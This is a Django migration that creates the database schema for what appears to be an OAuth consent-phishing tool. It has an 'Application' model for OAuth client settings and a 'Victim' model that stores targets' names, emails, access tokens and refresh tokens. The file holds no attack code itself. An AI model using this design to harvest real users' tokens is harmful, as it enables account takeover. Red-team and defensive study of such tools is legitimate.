# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-24 00:01
from __future__ import unicode_literals

from django.db import migrations, models


class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Application',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(help_text="Enter the Oauth Application's name", max_length=255, verbose_name='Application name')),
                ('redirect_url', models.URLField(help_text='The URL that the application receives tokens at', max_length=255, verbose_name='Redirect URL')),
                ('client_id', models.TextField(help_text='The Client ID generated for the application', verbose_name='Client ID')),
                ('authorization_url', models.URLField(help_text='The OAuth provider authentication URL', verbose_name='Authentication URL')),
                ('token_url', models.URLField(help_text='The OAuth provider token URL', verbose_name='Token URL')),
                ('client_secret', models.TextField(help_text='The generated application secret', verbose_name='Client Secret')),
                ('scopes', models.TextField(help_text='The scopes your application requires', verbose_name='Application scopes')),
                ('conclude_redirect', models.URLField(help_text='Where victims will be redirected after token redirect', verbose_name='Conclusion redirect')),
            ],
        ),
        migrations.CreateModel(
            name='Victim',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('email', models.EmailField(max_length=254)),
                ('access_token', models.TextField()),
                ('refresh_token', models.TextField()),
            ],
        ),
    ]
